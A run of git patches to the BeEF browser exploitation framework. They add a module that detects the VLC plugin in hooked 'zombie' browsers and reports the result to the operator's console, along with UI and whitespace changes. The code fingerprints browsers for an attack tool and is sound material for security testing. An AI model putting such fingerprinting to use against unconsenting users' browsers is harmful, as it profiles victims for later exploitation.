 create mode 100644 modules/browser/detect_vlc/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 0ab8b9145..aa8389603 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -911,15 +911,15 @@ beef.browser = {
 
             // Internet Explorer
         } else {
-	
+
 			var definedControls = [
 			    'RealPlayer',
 				'rmocx.RealPlayer G2 Control',
 			    'rmocx.RealPlayer G2 Control.1',
 			    'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
-			    'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'			    
+			    'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
 				];
-			
+
 			for (var i = 0; i < definedControls.length; i++) {
 
             	try {
@@ -939,6 +939,28 @@ beef.browser = {
 
     },
 
+    /**
+     *  Checks if VLC is installed
+     *  @return: {Boolean} true or false
+     **/
+    hasVLC:function() {
+        var vlc = false ;
+        if(!this.type().IE) {
+            for (i = 0; i < navigator.plugins.length; i++) {
+                if (navigator.plugins[i].name.indexOf("VLC") >= 0) {
+                    vlc = true;
+                }
+            }
+        } else {
+            try {
+                control = new ActiveXObject("VideoLAN.VLCPlugin.2");
+                vlc = true ;
+                } catch(e) {
+                }
+        };
+        return vlc ;
+    },
+
     /**
      * Checks if the zombie has Java enabled.
      * @return: {Boolean} true or false.
@@ -2126,8 +2148,9 @@ beef.browser = {
         var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
         var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
         var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
-		var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
-		var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
+        var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
+        var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
+        var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
         try{
             var cookies = document.cookie;
             var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
@@ -2169,8 +2192,9 @@ beef.browser = {
         if (has_googlegears) details['HasGoogleGears'] = has_googlegears
         if (has_activex) details['HasActiveX'] = has_activex;
         if (has_silverlight) details['HasSilverlight'] = has_silverlight;
-		if (has_quicktime) details['HasQuickTime'] = has_quicktime;
-		if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
+        if (has_quicktime) details['HasQuickTime'] = has_quicktime;
+        if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
+        if (has_vlc) details['HasVLC'] = has_vlc ;
 
         return details;
     },
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 0a570f2b8..b390360c3 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -270,7 +270,7 @@ module BeEF
           else
             self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
           end
-          
+
           # get and store the yes|no value for HasRealPlayer
           has_realplayer = get_param(@data['results'], 'HasRealPlayer')
           if BeEF::Filters.is_valid_yes_no?(has_realplayer)
@@ -279,6 +279,14 @@ module BeEF
             self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasVLC
+          has_vlc = get_param(@data['results'], 'HasVLC')
+          if BeEF::Filters.is_valid_yes_no?(has_vlc)
+            BD.set(session_id, 'HasVLC', has_vlc)
+          else
+            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
+          end
+
           # get and store the value for CPU
           cpu_type = get_param(@data['results'], 'CPU')
           if !cpu_type.nil?
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 1d06f4713..9c563a603 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -7,14 +7,14 @@ module BeEF
 module Extension
 module AdminUI
 module Controllers
-  
+
 #
 #
 #
 class Modules < BeEF::Extension::AdminUI::HttpController
-  
+
   BD = BeEF::Core::Models::BrowserDetails
-  
+
   def initialize
     super({
       'paths' => {
@@ -31,7 +31,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         '/commandmodule/reexecute'          => method(:reexecute_command_module)
       }
     })
-    
+
     @session = BeEF::Extension::AdminUI::Session.instance
   end
 
@@ -45,11 +45,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
          'token' => BeEF::Core::Configuration.instance.get("beef.api_token")
      }.to_json
   end
-  
+
   # Returns a JSON array containing the summary for a selected zombie.
   def select_zombie_summary
 
-    # get the zombie 
+    # get the zombie
     zombie_session = @params['zombie_session'] || nil
     (print_error "Zombie session is nil";return) if zombie_session.nil?
     zombie = BeEF::Core::Models::HookedBrowser.first(:session => zombie_session)
@@ -57,7 +57,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
     # init the summary grid
     summary_grid_hash = {
-      'success' => 'true', 
+      'success' => 'true',
       'results' => []
     }
 
@@ -83,6 +83,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -124,7 +125,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
           height = window_size_hash['height']
           data   = "Width: #{width}, Height: #{height}"
         else
-          data   = BD.get(zombie_session, p[2]) 
+          data   = BD.get(zombie_session, p[2])
       end
 
       # add property to summary hash
@@ -138,7 +139,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
     end
 
-    @body = summary_grid_hash.to_json  
+    @body = summary_grid_hash.to_json
   end
 
   # Returns the list of all command_modules in a JSON format
@@ -262,10 +263,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
   #Recursive function to sort all the parent's children
   def sort_recursive_tree(parent)
     # sort the children nodes by status and name
-    parent.each {|x| 
+    parent.each {|x|
       #print_info "Sorting: " + x['children'].to_s
       if x.is_a?(Hash) and x.has_key?('children')
-        x['children'] = x['children'].sort_by {|a| 
+        x['children'] = x['children'].sort_by {|a|
           fldr = a['cls'] ? a['cls'] : 'zzzzz'
           "#{fldr}#{a['status']}#{a['text']}"
         }
@@ -349,20 +350,20 @@ class Modules < BeEF::Extension::AdminUI::HttpController
          update_command_module_tree(tree, dyn_mod_category, command_module_icon_path, command_module_status, command_mod_name,dyn_mod.id)
        }
     end
-      
-    # sort the parent array nodes 
+
+    # sort the parent array nodes
     tree.sort! {|a,b| a['text'] <=> b['text']}
-    
+
     sort_recursive_tree(tree)
 
     retitle_recursive_tree(tree)
-    
 
-      
+
+
     # return a JSON array of hashes
     @body = tree.to_json
   end
-  
+
   # Returns the inputs definition of an command_module.
   def select_command_module
     command_module_id = @params['command_module_id'] || nil
@@ -377,7 +378,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
        @body = command_modules2json([key])
     end
   end
-  
+
   # Returns the list of commands for an command_module
   def select_command_module_commands
     commands = []
@@ -392,32 +393,32 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     nonce = @params['nonce'] || nil
     (print_error "nonce is nil";return) if nonce.nil?
     (print_error "nonce incorrect";return) if @session.get_nonce != nonce
-    
+
     # get the browser id
     zombie = Z.first(:session => zombie_session)
     (print_error "Zombie is nil";return) if zombie.nil?
     zombie_id = zombie.id
     (print_error "Zombie id is nil";return) if zombie_id.nil?
-      
+
     C.all(:command_module_id => command_module_id, :hooked_browser_id => zombie_id).each do |command|
       commands.push({
-        'id' => i, 
-        'object_id' => command.id, 
-        'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s, 
+        'id' => i,
+        'object_id' => command.id,
+        'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s,
         'label' => command.label
         })
       i+=1
     end
-      
+
     @body = {
-      'success' => 'true', 
+      'success' => 'true',
       'commands' => commands}.to_json
-      
+
   end
-  
+
   # Attaches an command_module to a zombie.
   def attach_command_module
-    
+
     definition = {}
 
     # get params
@@ -429,8 +430,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     nonce = @params['nonce'] || nil
     (print_error "nonce is nil";return) if nonce.nil?
     (print_error "nonce incorrect";return) if @session.get_nonce != nonce
-    
-    @params.keys.each {|param| 
+
+    @params.keys.each {|param|
       (print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
       (print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
       definition[param[4..-1]] = params[param]
@@ -449,10 +450,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
     @body = (exec_results != nil) ? '{success: true}' : '{success: false}'
   end
-  
+
   # Re-execute an command_module to a zombie.
   def reexecute_command_module
-    
+
     # get params
     command_id = @params['command_id'] || nil
     (print_error "Command id is nil";return) if command_id.nil?
@@ -462,15 +463,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     nonce = @params['nonce'] || nil
     (print_error "nonce is nil";return) if nonce.nil?
     (print_error "nonce incorrect";return) if @session.get_nonce != nonce
-    
+
     command.instructions_sent = false
     command.save
-    
+
     @body = '{success : true}'
   end
 
   def attach_dynamic_command_module
-    
+
     definition = {}
 
     # get params
@@ -482,8 +483,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     nonce = @params['nonce'] || nil
     (print_error "nonce is nil";return) if nonce.nil?
     (print_error "nonce incorrect";return) if @session.get_nonce != nonce
-    
-    @params.keys.each {|param| 
+
+    @params.keys.each {|param|
       (print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
       (print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
       definition[param[4..-1]] = params[param]
@@ -525,11 +526,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
 
   end
-  
+
   # Returns the results of a command
   def select_command_results
     results = []
-    
+
     # get params
     command_id = @params['command_id']|| nil
     (print_error "Command id is nil";return) if command_id.nil?
@@ -539,24 +540,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     # get command_module
     command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
     (print_error "command_module is nil";return) if command_module.nil?
-    
+
     resultsdb = BeEF::Core::Models::Result.all(:command_id => command_id)
     (print_error "Command id result is nil";return) if resultsdb.nil?
-    
+
     resultsdb.each{ |result| results.push({'date' => result.date, 'data' => JSON.parse(result.data)}) }
-    
+
     @body = {
-      'success'             => 'true', 
+      'success'             => 'true',
       'command_module_name' => command_module.name,
       'command_module_id'   => command_module.id,
       'results'             => results}.to_json
 
   end
-  
+
   # Returns the definition of a command.
   # In other words it returns the command that was used to command_module a zombie.
   def select_command
-    
+
     # get params
     command_id = @params['command_id'] || nil
     (print_error "Command id is nil";return) if command_id.nil?
@@ -573,9 +574,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
       command_module_name = command_module.name
       e = BeEF::Core::Command.const_get(command_module_name.capitalize).new(command_module_name)
     end
-            
+
     @body = {
-      'success' => 'true', 
+      'success' => 'true',
       'command_module_name'  => command_module_name,
       'command_module_id'    => command_module.id,
       'data'                 => BeEF::Module.get_options(command_module_name),
@@ -583,9 +584,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     }.to_json
 
   end
-  
+
   private
-  
+
   # Takes a list of command_modules and returns them as a JSON array
   def command_modules2json(command_modules)
     command_modules_json = {}
@@ -601,7 +602,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         command_modules_json[i] = h
         i += 1
     end
-    
+
     if not command_modules_json.empty?
       return {'success' => 'true', 'command_modules' => command_modules_json}.to_json
     else
@@ -612,15 +613,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
   # return the input requred for the module in JSON format
   def dynamic_modules2json(id)
     command_modules_json = {}
-    
+
     mod = BeEF::Core::Models::CommandModule.first(:id => id)
 
     # if the module id is not in the database return false
     return {'success' => 'false'}.to_json if(not mod)
-    
+
     # the path will equal Dynamic/<type> and this will get just the type
 		dynamic_type = mod.path.split("/").last
-		
+
     e = BeEF::Modules::Commands.const_get(dynamic_type.capitalize).new
     e.update_info(mod.id)
     e.update_data()
@@ -647,7 +648,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     return {'success' => 'true', 'command_modules' => payload_options_json}.to_json
 
   end
-  
+
 end
 
 end
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 6c99bafbf..71085648a 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -90,8 +90,9 @@ module BeEF
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
-			      has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
-						has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
+            has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
+            has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
+            has_vlc         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
             return {
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index ff5eb12ec..219f899a9 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -5,10 +5,10 @@
 //
 
 var ZombiesMgr = function(zombies_tree_lists) {
-	
+
 	//save the list of trees in the object
 	this.zombies_tree_lists = zombies_tree_lists;
-	
+
 	// this is a helper class to create a zombie object from a JSON hash index
 	this.zombieFactory = function(index, zombie_array){
 
@@ -26,8 +26,9 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_flash          = zombie_array[index]["has_flash"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
-        var has_java           = zombie_array[index]["has_java"];
+                var has_java           = zombie_array[index]["has_java"];
 		var has_activex        = zombie_array[index]["has_activex"];
+                var has_vlc            = zombie_array[index]["has_vlc"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
@@ -44,15 +45,16 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-        balloon_text+= "<br/>Java: "           + has_java;
-        balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+                balloon_text+= "<br/>Java: "           + has_java;
+                balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
+                balloon_text+= "<br/>VLC: "            + has_vlc;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
-		
+
 		var new_zombie = {
 			'id'           : index,
 			'ip'           : ip,
@@ -63,10 +65,10 @@ var ZombiesMgr = function(zombies_tree_lists) {
 			'domain'       : domain,
             'port'         : port
 		};
-		
+
 		return new_zombie;
 	}
-	
+
 	/*
 	 * Update the hooked browser trees
 	 * @param: {Literal Object} an object containing the list of offline and online hooked browsers.
@@ -75,33 +77,33 @@ var ZombiesMgr = function(zombies_tree_lists) {
 	this.updateZombies = function(zombies, rules){
 		var offline_hooked_browsers = zombies["offline"];
 		var online_hooked_browsers = zombies["online"];
-		
+
 		for(tree_type in this.zombies_tree_lists) {
 			hooked_browsers_tree = this.zombies_tree_lists[tree_type];
-			
+
 			//we compare and remove the hooked browsers from online and offline branches for each tree.
 			hooked_browsers_tree.compareAndRemove(zombies);
-			
+
 			//add an offline browser to the tree
 			for(var i in offline_hooked_browsers) {
 				var offline_hooked_browser = this.zombieFactory(i, offline_hooked_browsers);
 				hooked_browsers_tree.addZombie(offline_hooked_browser, false, ((tree_type != 'basic') ? true : false));
 			}
-			
+
 			//add an online browser to the tree
 			for(var i in online_hooked_browsers) {
 				var online_hooked_browser = this.zombieFactory(i, online_hooked_browsers);
 				hooked_browsers_tree.addZombie(online_hooked_browser, true, ((tree_type != 'basic') ? true : false));
 			}
-			
+
 			//apply the rules to the tree
 			hooked_browsers_tree.applyRules(rules);
-			
+
 			//expand the online hooked browser tree lists
 			if(hooked_browsers_tree.online_hooked_browsers_treenode.childNodes.length > 0) {
 				hooked_browsers_tree.online_hooked_browsers_treenode.expand(true);
 			}
-			
+
 			//expand the offline hooked browser tree lists
 			if(hooked_browsers_tree.offline_hooked_browsers_treenode.childNodes.length > 0) {
 				hooked_browsers_tree.offline_hooked_browsers_treenode.expand(true);
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 4c2bf5abf..2d57a286e 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -8,14 +8,14 @@ module Extension
 module Console
 
 class ShellInterface
-  
+
   BD = BeEF::Core::Models::BrowserDetails
-  
+
   def initialize(config)
     self.config = config
     self.cmd = {}
   end
-  
+
   def settarget(id)
     begin
       self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -25,7 +25,7 @@ class ShellInterface
       return nil
     end
   end
-  
+
   def setofflinetarget(id)
     begin
       self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -35,7 +35,7 @@ class ShellInterface
       return nil
     end
   end
-  
+
   def cleartarget
     self.targetsession = nil
     self.targetip = nil
@@ -45,9 +45,9 @@ class ShellInterface
 
   # @note Get commands. This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
   def getcommands
-    
+
     return if self.targetid.nil?
-    
+
     tree = []
     BeEF::Modules.get_categories.each { |c|
         if c[-1,1] != "/"
@@ -104,39 +104,39 @@ class ShellInterface
         update_command_module_tree(tree, dyn_mod_category, "Verified Unknown", command_mod_name,dyn_mod.id)
        }
     end
-    
-    # sort the parent array nodes 
+
+    # sort the parent array nodes
     tree.sort! {|a,b| a['text'] <=> b['text']}
-  
+
     # sort the children nodes by status
     tree.each {|x| x['children'] =
       x['children'].sort_by {|a| a['status']}
     }
-    
+
     # append the number of command modules so the branch name results in: "<category name> (num)"
     #tree.each {|command_module_branch|
     #  num_of_command_modules = command_module_branch['children'].length
     #  command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
     #}
-    
+
     # return a JSON array of hashes
     tree
   end
-  
+
   def setcommand(id)
     key = BeEF::Module.get_key_by_database_id(id.to_i)
-    
+
     self.cmd['id'] = id
     self.cmd['Name'] = self.config.get("beef.module.#{key}.name")
     self.cmd['Description'] = self.config.get("beef.module.#{key}.description")
     self.cmd['Category'] = self.config.get("beef.module.#{key}.category")
     self.cmd['Data'] = BeEF::Module.get_options(key)
   end
-  
+
   def clearcommand
     self.cmd = {}
   end
-  
+
   def setparam(param,value)
     self.cmd['Data'].each do |data|
       if data['name'] == param
@@ -145,12 +145,12 @@ class ShellInterface
       end
     end
   end
-  
+
   def getcommandresponses(cmdid = self.cmd['id'])
-    
+
     commands = []
     i = 0
-    
+
     BeEF::Core::Models::Command.all(:command_module_id => cmdid, :hooked_browser_id => self.targetid).each do |command|
       commands.push({
         'id' => i,
@@ -160,10 +160,10 @@ class ShellInterface
       })
       i+=1
     end
-    
+
     commands
   end
-  
+
   def getindividualresponse(cmdid)
     results = []
     begin
@@ -175,26 +175,26 @@ class ShellInterface
     end
     results
   end
-  
+
   def executecommand
     definition = {}
     options = {}
     options.store("zombie_session", self.targetsession.to_s)
     options.store("command_module_id", self.cmd['id'])
-    
+
     if not self.cmd['Data'].nil?
       self.cmd['Data'].each do |key|
         options.store("txt_"+key['name'].to_s,key['value'])
       end
     end
-    
-    options.keys.each {|param| 
+
+    options.keys.each {|param|
       definition[param[4..-1]] = options[param]
       oc = BeEF::Core::Models::OptionCache.first_or_create(:name => param[4..-1])
       oc.value = options[param]
 	    oc.save
     }
-    
+
     mod_key = BeEF::Module.get_key_by_database_id(self.cmd['id'])
     # Hack to rework the old option system into the new option system
     def2 = []
@@ -207,7 +207,7 @@ class ShellInterface
     else
       return false
     end
-    
+
     #Old method
     #begin
     #  BeEF::Core::Models::Command.new(  :data => definition.to_json,
@@ -218,10 +218,10 @@ class ShellInterface
     #rescue
     #  return false
     #end
-    
+
     #return true
   end
-  
+
   def update_command_module_tree(tree, cmd_category, cmd_status, cmd_name, cmd_id)
 
       # construct leaf node for the command module tree
@@ -240,7 +240,7 @@ class ShellInterface
         end
       }
   end
-  
+
   def get_command_module_status(mod)
       hook_session_id = self.targetsession
       if hook_session_id == nil
@@ -250,7 +250,7 @@ class ShellInterface
         'browser' => BD.get(hook_session_id, 'BrowserName'),
         'ver' => BD.get(hook_session_id, 'BrowserVersion'),
         'os' => [BD.get(hook_session_id, 'OsName')]})
-      
+
         when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
           return "Verified Not Working"
         when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY
@@ -268,12 +268,12 @@ class ShellInterface
   # Yoinked from the UI panel -
   # we really need to centralise all this stuff and encapsulate it away.
   def select_zombie_summary
-    
+
     return if self.targetsession.nil?
 
     # init the summary grid
     summary_grid_hash = {
-      'success' => 'true', 
+      'success' => 'true',
       'results' => []
     }
 
@@ -299,6 +299,7 @@ class ShellInterface
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -340,7 +341,7 @@ class ShellInterface
           height = window_size_hash['height']
           data   = "Width: #{width}, Height: #{height}"
         else
-          data   = BD.get(zombie_session, p[2]) 
+          data   = BD.get(zombie_session, p[2])
       end
 
       # add property to summary hash
@@ -356,14 +357,14 @@ class ShellInterface
 
     summary_grid_hash
   end
-  
+
   attr_reader :targetsession
   attr_reader :targetid
   attr_reader :targetip
   attr_reader :cmd
-  
+
   protected
-  
+
   attr_writer :targetsession
   attr_writer :targetid
   attr_writer :targetip
diff --git a/modules/browser/detect_vlc/command.js b/modules/browser/detect_vlc/command.js
new file mode 100644
index 000000000..7d653392c
--- /dev/null
+++ b/modules/browser/detect_vlc/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasVLC() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "vlc="+result);
+
+});
+
diff --git a/modules/browser/detect_vlc/config.yaml b/modules/browser/detect_vlc/config.yaml
new file mode 100644
index 000000000..ea621776b
--- /dev/null
+++ b/modules/browser/detect_vlc/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_vlc:
+            enable: true
+            category: "Browser"
+            name: "Detect VLC"
+            description: "This module will check if the browser has VLC plugin."
+            authors: ["nbblrr"]
+            target:
+                working: ["IE", "FF", "C"]
diff --git a/modules/browser/detect_vlc/module.rb b/modules/browser/detect_vlc/module.rb
new file mode 100644
index 000000000..4f183d03c
--- /dev/null
+++ b/modules/browser/detect_vlc/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_vlc < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['vlc'] = @datastore['vlc']
+		save content
+	end
+
+end

From 772b2fd1e7542286a1ac15b45142126bda17c6ff Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 22 Feb 2013 12:14:43 +1030
Subject: [PATCH 214/397] Add VLC details to hooked browser balloon popup

Part of issue #828
---
 extensions/admin_ui/controllers/panel/panel.rb              | 5 +++--
 extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js | 4 ++--
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 71085648a..541bfe284 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -113,8 +113,9 @@ module BeEF
                 'has_java'        => has_java,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
-				        'has_quicktime'   => has_quicktime,
-				        'has_realplayer'  => has_realplayer,
+                'has_quicktime'   => has_quicktime,
+                'has_vlc'         => has_vlc,
+                'has_realplayer'  => has_realplayer,
                 'date_stamp'      => date_stamp
             }
 
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 219f899a9..8423feec4 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -26,9 +26,9 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_flash          = zombie_array[index]["has_flash"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
-                var has_java           = zombie_array[index]["has_java"];
+		var has_java           = zombie_array[index]["has_java"];
 		var has_activex        = zombie_array[index]["has_activex"];
-                var has_vlc            = zombie_array[index]["has_vlc"];
+		var has_vlc            = zombie_array[index]["has_vlc"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];

From de1ab2d1f9d1647f25e5ee0f63035a53130dd11b Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 23 Feb 2013 12:32:57 +1030
Subject: [PATCH 215/397] Fix issue #838

Fixes detect_toolbars target configuration
---
 modules/browser/detect_toolbars/config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/browser/detect_toolbars/config.yaml b/modules/browser/detect_toolbars/config.yaml
index de53eabf7..abbac341c 100644
--- a/modules/browser/detect_toolbars/config.yaml
+++ b/modules/browser/detect_toolbars/config.yaml
@@ -13,4 +13,4 @@ beef:
             authors: ["gcattani"]
             target:
                 working: ["All"]
-                not_working: ["None"]
+                not_working: ["All"]

From 8f1a26ffa96a01fd90df6de878c4de5fd8871d96 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 23 Feb 2013 15:27:29 +1030
Subject: [PATCH 216/397] Add "Hardware" to console browser details

---
 extensions/console/lib/command_dispatcher/core.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/extensions/console/lib/command_dispatcher/core.rb b/extensions/console/lib/command_dispatcher/core.rb
index e36ff4930..904e5991a 100644
--- a/extensions/console/lib/command_dispatcher/core.rb
+++ b/extensions/console/lib/command_dispatcher/core.rb
@@ -142,11 +142,12 @@ class Core
           'Id',
           'IP',
           'Browser',
-          'OS'
+          'OS',
+          'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"

From bf2dc1d3874bdd6335157558eae424a17d558a5e Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 23 Feb 2013 15:27:54 +1030
Subject: [PATCH 217/397] Remove redundant line

---
 modules/browser/detect_toolbars/config.yaml | 1 -
